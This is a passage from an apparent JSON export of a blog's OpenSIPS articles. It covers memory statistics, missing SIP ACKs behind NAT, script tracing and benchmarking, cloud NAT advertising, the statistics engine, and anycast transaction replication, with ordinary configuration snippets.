\u0026#34;drouting\u0026#34; restart OpenSIPS and follow the steps from the previous sections. Checking the statistics during peak time you will get something like this:\n# opensipsctl fifo get_statistics shmem_group_traffic: shmem_group_provision: shmem_group_traffic:fragments:: 153618 shmem_group_traffic:memory_used:: 85448608 shmem_group_traffic:real_used:: 86677612 shmem_group_provision:fragments:: 245614 shmem_group_provision:memory_used:: 53217232 shmem_group_provision:real_used:: 55182144 Checking the traffic statistics will show you exactly how much memory OpenSIPS uses for calls, while checking the provision statistics will show you the memory used by the drouting module. The rest of memory is used by other other modules or by the core. If you want to track those down too, group them in a new mem-group.**\nDimensioning OpenSIPS memory As you have noticed throughout this article, dimensioning OpenSIPS for a specific number of clients or provisioning data is not an easy task and requires a deep understanding of both customer traffic patterns and provisioning data, as well as OpenSIPS internals. We hope that using the tips provided in this article will help you have a better understanding of your platform, how memory resources are used by OpenSIPS, and how to dimension your VoIP platform to the desired scale.\n","permalink":"https://wdd.js.org/opensips/blog/memory-usage/","summary":"原文:https://blog.opensips.org/2016/12/29/understanding-and-dimensioning-memory-in-opensips/\nRunning OpenSIPS with the right memory configuration is a very important task when developing and maintaining your VoIP service, because it has a direct effect over the scale of your platform, the customers you support, as well as the services you offer. Setting the limit to a low value might make OpenSIPS run out of memory during high volume of traffic, or during complex scenarios, while setting a big value might lead to wasted resources.","title":"理解并测量OpenSIPS的内存资源"},{"content":"We all experienced calls getting self disconnected after 5-10 seconds – usually disconnected by the callee side via a BYE request – but a BYE which was not triggered by the party behind the phone, but by the SIP stack/layer itself.This is one of the most common issues we get in SIP and one of the most annoying in the same time. But why it happens ?\nGetting to the missing ACK Such a decision to auto-terminate the call (beyond the end-user will and control) indicates an error in the SIP call setup. And because the call was somehow partially established (as both end-points were able to exchange media), we need to focus on the signalling that takes place after the 200 OK reply (when the call is accepted by the callee). So, what do we have between the 200 OK reply and the full call setup ? Well, it is the ACK requests – the caller acknowledgement for the received 200 OK.And according to the RFC3261, any SIP device not receiving the ACK to its final 2xx reply has to disconnect the call by issuing a standard BYE request.So, whenever you experience such 10 seconds disconnected calls, first thing to do is to do a SIP capture/trace and to check if the callee end-device is actually getting an ACK. It is very, very import to check for ACK at the level of the callee end-device, and not at the level of caller of intermediary SIP proxies – the ACK may get lost anywhere on the path from caller to callee.\nTracing the lost ACK In order to understand how and where the ACK gets lost, we need first to understand how the ACK is routed from caller to the callee’s end-device. Without getting into all the details, the ACK is routed back to callee based on the Record-Route and Contact headers received into the 200 OK reply. So, if the ACK is mis-routed, it is mainly because of wrong information in the 2oo OK.The Record-Route headers (in the 200 OK) are less to blame, as they are inserted by the visited proxies and not changed by anyone else. Assuming that you do not have some really special scenarios with SIP proxies behind NATs, we can simply discard the possibility of having faulty Record-Routes.So, the primary suspect is the Contact header in the 200 OK – this header is inserted by the callee’s end-device and it can be altered by any proxy in the middle – so there are any many opportunities to get corrupted. And this mainly happens due to wrong handling of NAT presence on end-user side – yes, that’s it, a NATed callee device.\nCommon scenarios No NAT handling If the proxy does not properly handle NATed callee device, it will propagate into the _200 OK_reply the private IP of the callee. And of course, this IP will be unusable when comes to routing back the ACK to the callee – the proxy will have the “impossible” mission to route to a private IP :). So, the ACK will get lost and call will get disconnected.\nIf the case, with OpenSIPS, you will have to review your logic in the onreply route and perform fix_nated_contact() for the 200 OK, if callee is known as NATed.\nThe correct handling and flow has to be like this:\nExcessive NAT handling While handling NATed end-points is good, you have to be careful not to over do it. If you see a private IP in the Contact header you should not automatically replace it with the source IP of the SIP packet. Or you should not do it for any incoming reply (like “let’s do it all the time, just to be sure”).\nIn a more complex scenarios where a call may visit multiple SIP proxies, the proxies may loose valuable routing information by doing excessive NAT traversal handling. Like in the scenario below, ProxyA is over doing it, by applying the NAT traversal logic also for calls coming from a proxy (ProxyB) and not only for replies coming from an end-point. By doing this, the IP coordinates of the callee will be lost from Contact header, as ProxyA has no direct visibility to callee (in terms of IP).\nIn such a case, with OpenSIPS, you will have to review your logic in the onreply route and to be sure you perform fix_nated_contact() for the 200 OK only if the reply comes from an end-point and not from another proxy.\nConclusions SIP is complicated and you have to pay attention to all the details, if you want to get it to work. Focusing only on routing the INVITE requests is not sufficient.If you come across disconnected calls:\nget a SIP capture/trace and see if the ACK gets to the callee end-point if not, check the Contact header in the 200 OK – it must point all the time to the callee end-point (a public IP) if not, check the NAT traversal logic you have in the onreply routes – be sure you do the Contact fixing only when it is needed. Shortly, be moderate, not too few and not too much …when comes to NAT handling ","permalink":"https://wdd.js.org/opensips/blog/miss-ack/","summary":"We all experienced calls getting self disconnected after 5-10 seconds – usually disconnected by the callee side via a BYE request – but a BYE which was not triggered by the party behind the phone, but by the SIP stack/layer itself.This is one of the most common issues we get in SIP and one of the most annoying in the same time. But why it happens ?\nGetting to the missing ACK Such a decision to auto-terminate the call (beyond the end-user will and control) indicates an error in the SIP call setup.","title":"Troubleshooting missing ACK in SIP"},{"content":"What makes OpenSIPS such an attractive and powerful SIP solutions is its high level of programmability, thanks to its C-like configuration script. But once you get into the “programming” area, you will automatically need tools and skills for troubleshooting.So here there are some some tips and tools you can use in OpenSIPS for “debugging” your configuration script.\nControlling the script logging The easiest way to troubleshoot your script is of course by using the xlog() core function and print your own messages. Still the internal OpenSIPS logs (generated by the OpenSIPS code) do provide a lot of information about what OpenSIPS is doing.The challenge with the logging is to control the amount and content of messages you want to log. Otherwise you will end up with huge piles of logs, completely impossible to read and follow.By using the $log_level script variable you can dynamically change the logging level (to make it more or less verbose) from the script level. You can do this only for parts of the script:\nlog_level= -1 # errors only ….. { …… $log_level = 4; # set the debug level of the current process to DEBUG uac_replace_from(….); $log_level = NULL; # reset the log level of the current process to its default level ……. }\nor only for certain messages, based on source IP (you can use the permissions module for a more dynamic approach, controlled via DB)\nif ($si==”11.22.33.44″) $log_level = 4;\nor some parts of the message (you can use the dialplan module for the dynamic approach):\nif ($rU==”911″) $log_level = 4;\nIMPORTANT: do not forget to reset the log level back to default before terminating the script, otherwise that log level will be used by the current process for all the future messages it will handle.\nTracing the script execution Still, using the xlog() core function may not be the best option as it implies a high script pollution and many script changes (with restarts, of course).So, a better alternative is the script_trace() core function. Once you enabled the script tracing, OpenSIPS will start logging its steps though the script execution, printing each function that is called and its line in the script file.This script tracing is really helpful when you want to understand or troubleshoot your script execution, answering questions like “why does my script not get to this route” or “why is the script function not called” or “I do not understand how the SIP message flows through my script“….. and many other similar problems.The script_trace() function can help even more by allowing you to trace the value of certain variables (or parts of the message) during the script execution. Like “I do not understand where in script my RURI is changed“. So you simply attach to the function a log line (with variables, of course) that will be evaluated and printed for each function in the script:\nscript_trace( 1, “$rm from $si, ruri=$ru”, “me”);\nwill produce:\n[line 578][me][module consume_credentials] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 581][me][core setsflag] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 583][me][assign equal] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 592][me][core if] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 585][me][module is_avp_set] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 589][me][core if] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 586][me][module is_method] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 587][me][module trace_dialog] -\u0026gt; (INVITE 127.0.0.1 , ruri=sip:tester@opensips.org) [line 590][me][core setflag] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org)\nAgain, you can enable the script tracing only for some cases (on demand). For example I want to trace only calls from a certain subscriber, so I can use the dialplan module and create in DB rules to match the subscribers I’m interested in tracing:\nif ( dp_translate(“1″,”$fU/$var(foo)”) )\ncaller must be traced according to dialplan 1 script_trace( 1, “$rm from $si, ruri=$ru”, “me”);\nBenchmarking the script Assuming that you get to a point where you managed to troubleshoot and fix your script in terms of the execution flow, you now may be interested in troubleshoot the script execution from the time perspective – how much time takes OpenSIPS to execute certain parts of the script.This is a mandatory step if you want to perform a performance analysis of your OpenSIPS setup.The benchmark module will help you to measure the time OpenSIPS took to execute different parts of the script:\nbm_start_timer(“lookup-timer”); lookup(“location”); bm_log_timer(“lookup-timer”);\nAn interesting capability of the module is to provide information about the current usage, but also aggregated information from the past, like how many times a certain timer was used or what was the total time spent in a timer (see the full provided information). And even more, such information can be pulled via Management Interface via the bm_poll_results command, for external usage:\nopensipsctl fifo bm_poll_results register-timer 3/40/12/14/13.333333 9/204/12/97/22.666667 lookup-timer 3/21/7/7/7.000000 9/98/7/41/10.888889\nIdentifying script bottlenecks But still you need to find the weak points of your script in terms on time to process. Or the bottlenecks of your script.OpenSIPS provides a very useful mechanism for this – the time thresholds. There are different thresholds, for different operations, that can be set in OpenSIPS core and modules. Whenever the execution takes longer than configured, OpenSIPS will report it to the log, together with additional useful information (such as operation details or script backtrace):\nexec_msg_threshold (core) – the maximum number of microseconds the processing of a SIP msg is expected to last. This is very useful to identify the “slow” functions in your overall script; exec_dns_threshold (core) – the maximum number of microseconds a DNS query is expected to last. This is very useful to identify what are the “slow” DNS queries in your routing (covering also SRV, NAPTR queries too);** tcp_threshold (core) – maximum number of microseconds sending a TCP request is expected to last. This is useful to identify the “slow” TCP connections (in terms of sending data). Note that this option will cover all TCP-based transports, like TCP plain, TLS, WS, WSS, BIN or HEP. exec_query_threshold (db_mysql module) – maximum number of microseconds for running a mysql query. This is useful to identify the “slow” query you may have. Note that this option covers all the mysql queries you may have in OpenSIPS – from script level or internally triggered by modules. A similar option is also in the db_postgres module too. An example for the output trigger by the exec_msg_threshold :\nopensips[17835]: WARNING:core:log_expiry: threshold exceeded : msg processing took too long – 223788 us.Source : BYE sip:………. opensips[17835]: WARNING:core:log_expiry: #1 is a module action : match_dialog – 220329us – line 1146 opensips[17835]: WARNING:core:log_expiry: #2 is a module action : t_relay – 3370us – line 1574 opensips[17835]: WARNING:core:log_expiry: #3 is a module action : unforce_rtp_proxy – 3297us – line 1625 opensips[17835]: WARNING:core:log_expiry: #4 is a core action : 78 – 24us – line 1188 opensips[17835]: WARNING:core:log_expiry: #5 is a module action : subst_uri – 8us – line 1201\nGood luck with the troubleshooting and be sure your OpenSIPS rocks !!\n","permalink":"https://wdd.js.org/opensips/blog/troubleshooting-opensips-script/","summary":"What makes OpenSIPS such an attractive and powerful SIP solutions is its high level of programmability, thanks to its C-like configuration script. But once you get into the “programming” area, you will automatically need tools and skills for troubleshooting.So here there are some some tips and tools you can use in OpenSIPS for “debugging” your configuration script.\nControlling the script logging The easiest way to troubleshoot your script is of course by using the xlog() core function and print your own messages.","title":"Troubleshooting OpenSIPS script"},{"content":"Cloud computing is a more and more viable option for running and providing SIP services. The question is how compatible are the SIP services with the Cloud environment ? So let’s have a look at this compatibility from the most sensitive (for SIP protocol) perspective – the IP network topology.A large number of existing clouds (like EC2, Google CP, Azure) have a particularity when comes to the topology of the IP network they provide – they do not provide public routable IPs directly on the virtual servers, rather they provide private IPs for the servers and a fronting public IP doing a 1-to-1 NAT to the private one.Such a network topology forces you to run the SIP service behind a NAT. Why is this such a bad thing? Because, unlike other protocols (such as HTTP), SIP is very intimate with the IP addresses – the IPs are part of the SIP messages and used for routing. So, a SIP server running on a private IP advertises its listening IP address (the private one) in the SIP traffic – this will completely break the SIP routing, both at transaction and dialog level :\ntransaction level – when sending a SIP request, the SIP server will construct the Via SIP header using its listening IP, so the private IP. But the information from the Via header is used by the receiver of the SIP request in order to route back the SIP replies. But routing to a private IP (from the public Internet) is mission impossible; dialog level – in a similar way, when sending an INVITE request, the SIP server will advertise in its Contact SIP header the private IP, so other SIP party will not be able to send any sequential request back to our server. So, how can OpenSIPS help you to run SIP services in the Cloud ?\nRunning OpenSIPS behind NAT OpenSIPS implements a smart mechanism of separating the IPs used at network level (as listeners) and the IPs inside the SIP messages.The “advertise” mechanism gives you full control of what IP is presented (or advertised) in the SIP messages, despite what IP is used for the networking communication. Shortly you can have OpenSIPS sending a SIP request from the 10.0.0.15 private IP address, but using for inside the message (as Via, Contact or Route) a totally different IP.When advertising a different IP (than the network layer), the following parts of the SIP message will be affected:\nthe introduced Via header (if a SIP request) the introduced Record-Route header (if a SIP request) the introduced Contact header OpenSIPS has a a very flexible way to control the advertised IP, at different levels: global, per listening interface or per SIP transaction\nGlobal Advertising Such advertising will affect the entire traffic handled by OpenSIPS, automatically, without any additional action in the actual routing script. This setting is achieved via the advertised_addressglobal parameter:advertised_address=\u0026ldquo;12.34.56.78\u0026rdquo;\nPer Interface Advertising For more complex scenarios when using multiple listening interfaces, you can opt for different advertised IP for each listener. Some listener may be bound to the NATed IP address, so you want to do advertising, some other listener may be bound to a private IP used only inside the private network, so you want no advertising.listen = udp:10.0.0.34:5060 as 99.88.44.33:5060listen = udp:10.0.0.36:5060All the SIP traffic routing through such an advertising interface will be automatically modified. The only thing you have to do is to be sure you properly control the usage of interfaces when you route your SIP traffic – usually switching to a different interface, by using the force_send_socket() script function.\nPer Transaction Advertising The finest granularity OpenSIPS offers for controlling the advertising IP is at SIP transaction level – that is, for each transaction (a SIP requests and all its replies) you can choose what should be the advertised IP.Such control is done at via the routing script – when routing the SIP requests, you can enforce a value to be advertise for its transactionset_advertised_address( 12.34.56.78 );As a small but important note : advertising a different IP identity may act as a boomerang – your OpenSIPS may be required to recognize itself based on IP you previously advertised. Like the IP advertised in an INVITE request in the Record-Route header must be recognized by OpenSIPS as “its own IP” later, when receiving a sequential request like ACK or BYE and inspecting the Route header.If for the global and per-interface advertising OpenSIPS is automatically able to recognize its own advertised IP’s, for the per-transaction level it cannot not. So you have to explicitly take care of that and teach OpenSIPS about the IP’s you plan to advertise by using the alias core parameter.\nRunning RTPproxy behind NAT So far we covered the OpenSIPS related part. But in many SIP scenarios you may be required to handle the media/RTP too, for cases like call recording, media pinning, DTMF sniffing or other.So, you may end up with the need of running RTPproxy behind an 1-to-1 NAT. Fortunately things are much more simple here. The nature of the 1-to-1 NAT takes care of the port mapping between the public NAT IP and the private IP. The only thing you have to do is to advertise the public IP in the SIP SDP, while keeping RTPproxy to operate on the private IP.To get this done, when using one of the RTPproxy related functions like rtpproxy_engage(), rtpproxy_answer() or rtpproxy_offer(), simply use the second parameter of these function to overwrite (in the SDP) the IP received from RTPproxy with the IP you want to advertise:rtpproxy_engage(\u0026ldquo;co\u0026rdquo;,\u0026ldquo;23.45.67.89\u0026rdquo;);This will result in having the 23.45.67.89 IP advertised in the SDP, rather than the IP RTPproxy is running on. And no other change is required in the actual RTPproxy configuration.\nWhat’s next ? What we covered so far here is a relatively simple scenario, still it is the mostly used one – an OpenSIPS behind NAT serving SIP client on the public Internet.But things are getting more complicated and interesting when you also want to offer media services (like voicemail) or you want to support SIP clients from both public and private networks – and these are the topics for some future posts on this matter.\n","permalink":"https://wdd.js.org/opensips/blog/runing-opensips-in-cloud/","summary":"Cloud computing is a more and more viable option for running and providing SIP services. The question is how compatible are the SIP services with the Cloud environment ? So let’s have a look at this compatibility from the most sensitive (for SIP protocol) perspective – the IP network topology.A large number of existing clouds (like EC2, Google CP, Azure) have a particularity when comes to the topology of the IP network they provide – they do not provide public routable IPs directly on the virtual servers, rather they provide private IPs for the servers and a fronting public IP doing a 1-to-1 NAT to the private one.","title":"Running OpenSIPS in the Cloud"},{"content":"无论你是经验丰富的OpenSIPS管理员,或者你仅仅想找到为什么ACK消息在你的网络中循环发送,唯一可以确定的是:我们或早或晚会需要OpenSIPS提供数据来回答以下问题\nOpenSIPS运行了多久? 我们是否被恶意流量攻击了? 我们的平台处理了多少个来自运营商的无效SIP包 在流量峰值时,OpenSIPS是否拥有足够的内存来支撑运行 \u0026hellip; 幸运的是,OpenSIPS提供内置的统计支持,来方便我们快速解决以上问题。详情可以查看OpenSIPS统计接口。在本篇文章中,我们将会了解统计引擎,但是,什么是引擎?\n统计引擎 总的来说,下图就是OpenSIPS引擎的样子。\n统计引擎内置于OpenSIPS。它管理所有的统计数据,并且暴露一个标准的CRUD操作接口给所有的模块,让模块可以推送或者管理他们自己的统计数据。\n一下有三种方式来和统计引擎进行交互\n直接通过脚本访问。如通过$script(my-stat)变量 使用HTTP请求来访问 使用opensipsctl fifo命令 统计引擎是非常灵活并且可以通过不同方式与其交互,那么它怎么能让我们的使用变得方便呢?下面的一些建议,能够让你全面的发挥静态统计引擎的能力,来增强某些重要的层面。\n系统开发维护 当你处理OpenSIPS的DevOps时,你经常需要监控OpenSIPS的一些运行参数。你的关注点不同,那么你就需要监控不同的方面,例如SIP事务、对话、内存使用、系统负载等等\n下面是OpenSIPS统计分组的一个概要,以及组内的每一个统计值,详情可以参考wiki。\n统计简介 假如我们想通过sipp对我们的平台进行流量测试,我们想压测期间观测当前的事务、对话、共享内存的值变化。或者我们我们有了一个新的SIP提供商,他们每天早上9点会开始向我们平台推送数据,我们需要监控他们的推送会对我们系统产生的影响。\n你可以在OpenSIPS实例中输入以下指令:\nwatch -n0.2 \u0026#39;opensipsctl fifo get_statistics inuse_transactions dialog: shmem:\u0026#39; 注意 get_statistics命令即可以接受一个统计值项,也可以接受一个统计组的项。统计组都是以冒号(:)结尾。\n与递增的统计指标进行交互 统计指标看起来相同,实际上分为两类\n累计值。累计是一般是随着时间增长,例如rcv_requests, processed_dialogs,表示从某个时间点开始累计收到或者处理了多少个任务 计算值。计算值一般和系统运行负载有关,和时间无关。例如active_dialogs, real_used_size, 这些值都是由内部函数计算出来的计算值 一般来说,脚本中定义的统计值都是递增的,OpenSIPS无法重新计算它,只能我们自己来计算或者维护它的值。\n以下方式可以快速查看计算值类的统计项\nopensipsctl fifo list_statistics 某些场景,你可能需要周期性的重置累计值类的统计项。例如你可以只需要统计当天的processed_dialogs,daily_routed_minutes,那么你只需要设置一个定时任务,每天0点,重置这些统计值。\nopensipsctl fifo reset_statistics processed_dialogs 在脚本中自定义统计项 在脚本中自定义统计项是非常简单的,只需要做两步\n加载statistics.so模块 在某些位置调用函数, update_stat(\u0026quot;daily_routed_minutes\u0026quot;, \u0026quot;+1\u0026quot;) 实战:脚本中有许多的自定义统计项 统计每天收到的SIP消息的请求方式, 以及处理的消息长度 每隔24小时,以JSON的形式,将消息写到SIP服务器 # 设置统计组 modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_groups\u0026#34;, \u0026#34;method, packet\u0026#34;) # 请求路由 route { ... update_stat(\u0026#34;method:$rm\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:count\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:total_size\u0026#34;, \u0026#34;$ml\u0026#34;) # message length ... } # 响应路由 onreply_route { update_stat(\u0026#34;packet:count\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:total_size\u0026#34;, \u0026#34;$ml\u0026#34;) } # 定时器路由,定时通过HTTP发请求 timer_route [daily_stat_push, 86400] { $json(all_stats) := \u0026#34;{\\\u0026#34;method\\\u0026#34;: {}, \\\u0026#34;packet\\\u0026#34;: {}}\u0026#34;; # pack and clear all method-related statistics stat_iter_init(\u0026#34;method\u0026#34;, \u0026#34;iter\u0026#34;); while (stat_iter_next(\u0026#34;$var(key)\u0026#34;, \u0026#34;$var(val)\u0026#34;, \u0026#34;iter\u0026#34;)) { $json(all_stats/method/$var(key)) = $var(val); reset_stat(\u0026#34;$var(key)\u0026#34;); } # pack and clear all packet-related statistics stat_iter_init(\u0026#34;packet\u0026#34;, \u0026#34;iter\u0026#34;); while (stat_iter_next(\u0026#34;$var(key)\u0026#34;, \u0026#34;$var(val)\u0026#34;, \u0026#34;iter\u0026#34;)) { $json(all_stats/packet/$var(key)) = $var(val); reset_stat(\u0026#34;$var(key)\u0026#34;); } # push the data to our web server if (!rest_post(\u0026#34;https://WEB_SERVER\u0026#34;, \u0026#34;$json(all_stats)\u0026#34;, , \u0026#34;$var(out_body)\u0026#34;, , \u0026#34;$var(status)\u0026#34;)) xlog(\u0026#34;ERROR: during HTTP POST, $json(all_stats)\\n\u0026#34;); if ($var(status) != 200) xlog(\u0026#34;ERROR: web server returned $var(status), $json(all_stats)\\n\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/blog/deepin-stat-engine/","summary":"无论你是经验丰富的OpenSIPS管理员,或者你仅仅想找到为什么ACK消息在你的网络中循环发送,唯一可以确定的是:我们或早或晚会需要OpenSIPS提供数据来回答以下问题\nOpenSIPS运行了多久? 我们是否被恶意流量攻击了? 我们的平台处理了多少个来自运营商的无效SIP包 在流量峰值时,OpenSIPS是否拥有足够的内存来支撑运行 \u0026hellip; 幸运的是,OpenSIPS提供内置的统计支持,来方便我们快速解决以上问题。详情可以查看OpenSIPS统计接口。在本篇文章中,我们将会了解统计引擎,但是,什么是引擎?\n统计引擎 总的来说,下图就是OpenSIPS引擎的样子。\n统计引擎内置于OpenSIPS。它管理所有的统计数据,并且暴露一个标准的CRUD操作接口给所有的模块,让模块可以推送或者管理他们自己的统计数据。\n一下有三种方式来和统计引擎进行交互\n直接通过脚本访问。如通过$script(my-stat)变量 使用HTTP请求来访问 使用opensipsctl fifo命令 统计引擎是非常灵活并且可以通过不同方式与其交互,那么它怎么能让我们的使用变得方便呢?下面的一些建议,能够让你全面的发挥静态统计引擎的能力,来增强某些重要的层面。\n系统开发维护 当你处理OpenSIPS的DevOps时,你经常需要监控OpenSIPS的一些运行参数。你的关注点不同,那么你就需要监控不同的方面,例如SIP事务、对话、内存使用、系统负载等等\n下面是OpenSIPS统计分组的一个概要,以及组内的每一个统计值,详情可以参考wiki。\n统计简介 假如我们想通过sipp对我们的平台进行流量测试,我们想压测期间观测当前的事务、对话、共享内存的值变化。或者我们我们有了一个新的SIP提供商,他们每天早上9点会开始向我们平台推送数据,我们需要监控他们的推送会对我们系统产生的影响。\n你可以在OpenSIPS实例中输入以下指令:\nwatch -n0.2 \u0026#39;opensipsctl fifo get_statistics inuse_transactions dialog: shmem:\u0026#39; 注意 get_statistics命令即可以接受一个统计值项,也可以接受一个统计组的项。统计组都是以冒号(:)结尾。\n与递增的统计指标进行交互 统计指标看起来相同,实际上分为两类\n累计值。累计是一般是随着时间增长,例如rcv_requests, processed_dialogs,表示从某个时间点开始累计收到或者处理了多少个任务 计算值。计算值一般和系统运行负载有关,和时间无关。例如active_dialogs, real_used_size, 这些值都是由内部函数计算出来的计算值 一般来说,脚本中定义的统计值都是递增的,OpenSIPS无法重新计算它,只能我们自己来计算或者维护它的值。\n以下方式可以快速查看计算值类的统计项\nopensipsctl fifo list_statistics 某些场景,你可能需要周期性的重置累计值类的统计项。例如你可以只需要统计当天的processed_dialogs,daily_routed_minutes,那么你只需要设置一个定时任务,每天0点,重置这些统计值。\nopensipsctl fifo reset_statistics processed_dialogs 在脚本中自定义统计项 在脚本中自定义统计项是非常简单的,只需要做两步\n加载statistics.so模块 在某些位置调用函数, update_stat(\u0026quot;daily_routed_minutes\u0026quot;, \u0026quot;+1\u0026quot;) 实战:脚本中有许多的自定义统计项 统计每天收到的SIP消息的请求方式, 以及处理的消息长度 每隔24小时,以JSON的形式,将消息写到SIP服务器 # 设置统计组 modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_groups\u0026#34;, \u0026#34;method, packet\u0026#34;) # 请求路由 route { ... update_stat(\u0026#34;method:$rm\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:count\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:total_size\u0026#34;, \u0026#34;$ml\u0026#34;) # message length .","title":"深入OpenSIPS统计引擎"},{"content":"he advantages of doing Load Balancing and High Availability **without **any particular requirements from the clients side are starting to make Anycast IPs more and more appealing in the VoIP world. But are you actually using the best out of it? This article describes how you can use OpenSIPS 2.4 to make the best use of an anycast environment.Anycast is a UDP-based special network setup where a single IP is assigned to multiple nodes, each of them being able to actively use it (as opposed to a VRRP setup, where only one instance can use the IP). When a packet reaches the network with an anycast destination, the router sends it to the “closest” node, based on different metrics (application status, network latency, etc). This behavior ensures that traffic is (1) balanced by sending it to one of the least busy nodes (based on application status) and also ensures (2) geo-distribution, by sending the request to the closest node (based on latency). Moreover, if a node goes down, it will be completely put out of route, ensuring (3) high availability for your platform. All these features without any special requirements from your customers, all they need is to send traffic to the anycast IP.Sounds wonderful, right? It really is! And if you are running using anycast IPs in a transaction stateless mode, things just work out of the box.\nState of the art A common Anycast setup is to assign the anycast IPs to the nodes at the edge of your platform, facing the clients. This setup ensures that all three features (load balancing, geo-distribution and high-availability) are provided for your customers’ inbound calls. However, most of the anycast “stories” we have heard or read about are only using the anycast IP for the initial incoming INVITEs from customers. Once received, the entire call is pinned to a unicast IP of the first server that received the INVITE. Therefore all sequential messages will go through that single unicast IP. Although this works fine from SIP point of view, you will lose all the anycast advantages such as high-availability.When using this approach (of only receiving initial request on the anycast IP) the inbound calls to the clients will also be affected, because besides losing dialog high-availability, you will also need to ask all your clients to accept calls from all your available unicast IPs. Imagine what happens when you add a new node.Our full anycast solution aims to sort out these limitations by always keeping the anycast IPs in the route for the entire call. This means that your clients will always have one single IP to provision, the anycast IP. And when a node goes down, all sequential messages will be re-routed (by the router) to the next available node. Of course, this node needs to have the entire call information to be able to properly close the call, but that can be easily done in OpenSIPS using dialog replication.Besides the previous issue, most of the time running in stateless mode is not possible due to application logic constraints (re-transmission handling, upstream timeout detection, etc.). Thus stateful transaction mode is required, which complicates a bit more our anycast scenario.\nAnycast in a transaction stateful scenario A SIP transaction consists of a request and all the replies associated to that request. According to the SIP RFC, when a stateful SIP proxy sends a request, the next hop should immediately send a reply as soon as it received the request. Otherwise, the SIP proxy will start re-transmitting that request until it either receives a reply, or will eventually time out. Now, let’s consider the anycast scenario described in Figure 1: Figure 1.OpenSIPS instance 1 sends an INVITE to the client, originated from the Anycast IP interface. The INVITE goes through the Router, and reaches the Client’s IP. However, when the Client replies with 200 OK, the Router decides the “shortest” path is to OpenSIPS instance 2, which has no information about the transaction. Therefore, instance 2 drops all the replies. Moreover, since instance 1 did not receive any reply, it will start re-transmitting the INVITE. And so on, and so forth, until instance 1 times out, because it did not receive any reply, and the Client times out because there was no ACK received for its replies. Therefore the call is unable to complete.To overcome this behavior, we have developed a new mechanism that is able to handle transactions in such distributed environments. The following section describes how this is done.\nDistributed transactions handling Transactions are probably the most complicated structures in SIP, especially because they are very dynamic (requests and replies are exchanged within milliseconds) and they contain a lot of data (various information from the SIP messages, requests for re-transmissions, received replies, multiple branches, etc). That makes them very hard to move around between different instances. Therefore, instead of sending transaction information to each node within the anycast “cluster”, our approach was to bring the events to the node that created the transaction. This way we minimize the amount of data exchanged between instances – instead of sending huge transaction data, we simply replicate one single message – and we are only doing this when it’s really necessary – we are only replicating messages when the router that manages the anycast config switches to a different node.When doing distributed transaction handling, the logic of the transaction module is the following: when a reply comes on one server, we check whether the current node has a transaction for that reply. If it does (i.e. the router did not switch the path), the reply is processed locally. If it does not, then somebody else must “own” that transaction. The question is who? That’s where the SIP magic comes: when we generate the INVITE request towards the client, we add a special parameter in the VIA header, indicating the ID of the node that created the transaction. When the reply comes back, that ID contains exactly the node that “owns” the transaction. Therefore, all we have to do is to take that ID and forward the message to it, using the proto_bin module. When the “owner” receives the reply, it “sees” it exactly as it would have received it directly from the client, thus treating it exactly as any other regular reply. And the call is properly established further. Figure 2.There is one more scenario that needs to be taken into account, namely what happens when a CANCEL message reaches a different node (Figure 2). Since there is no transaction found on node 2, normally that message would have been declined. However, in an anycast environment, the transaction might be “owned” by a different node. , therefore, we need to instruct him that the transaction was canceled. However, this time we have no information about who “owns” that transaction – so all we can do is to broadcast the CANCEL event to all the nodes within the cluster. If any of the nodes that receive the event find the transaction that the CANCEL refers to, it will properly reply a 200 OK message and then close all the ongoing branches. If no transaction is found on any node, the CANCEL will eventually time out on the Client side.A similar approach is done for a hop-by-hop ACK message received in an anycast interface.\nAnycast Configuration The first thing we have to do is to configure the anycast address on each node that uses it. This is done in the listen parameter:\nlisten = udp:10.10.10.10:5060 anycast The distributed transaction handling feature relies on the clusterer module to group the nodes that use the same anycast address in a cluster. The resulting cluster id has to be provisioned using the tm_replication_cluster parameter of the transaction module:\nloadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;tm_replication_cluster\u0026#34;, 1) The last thing that we need to take care of is the hop-by-hop messages, such as ACK. This is automatically done by using the t_anycast_replicate() function: if (!loose_route()) { if (is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; !t_check_trans()) { # transanction not here - replicate msg to other nodes t_anycast_replicate(); exit; } } Notice that the CANCEL is not treated in the snippet above. That is because CANCEL messages received on an anycast interface are automatically handled by the transaction layer as described in the previous section. However, if one intends to explicitly receive the CANCEL message in the script to make any adjustments (i.e. change the message Reason), they can disable the default behavior using the cluster_auto_cancel param. However, this changes the previous logic a bit, since the CANCEL must be replicated as well in case no transaction is locally found:\nmodparam(\u0026#34;tm\u0026#34;, \u0026#34;cluster_auto_cancel\u0026#34;, no) ... if (!loose_route()) { if (!t_check_trans()) { if (is_method(\u0026#34;CANCEL\u0026#34;)) { # do your adjustments here t_anycast_replicate(); exit; } else if is_method(\u0026#34;ACK\u0026#34;) { t_anycast_replicate(); exit; } } } And that’s it – you have a fully working anycast environment, with distributed transaction matching!\nFind out more! The distributed transaction handling mechanism has already been released on the OpenSIPS 2.4 development branch. To find out more about the design and internals of this feature, as well as other use cases, make sure you do not miss the Full Anycast support at the edge of your platform using OpenSIPS 2.4 presentation about this at the Amsterdam 2018 OpenSIPS Summit, May 1-4!\n","permalink":"https://wdd.js.org/opensips/blog/full-anycast/","summary":"he advantages of doing Load Balancing and High Availability **without **any particular requirements 